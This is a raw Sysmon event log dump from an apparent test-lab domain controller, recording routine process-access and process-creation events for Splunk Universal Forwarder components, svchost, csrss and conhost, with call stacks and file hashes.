14:08:36.717{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.561{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.545{59A5CD1D-966D-6005-7B05-00000000A301}61084100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.392{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.389{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.389{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.893{59A5CD1D-966E-6005-7D05-00000000A301}45644544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.733{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 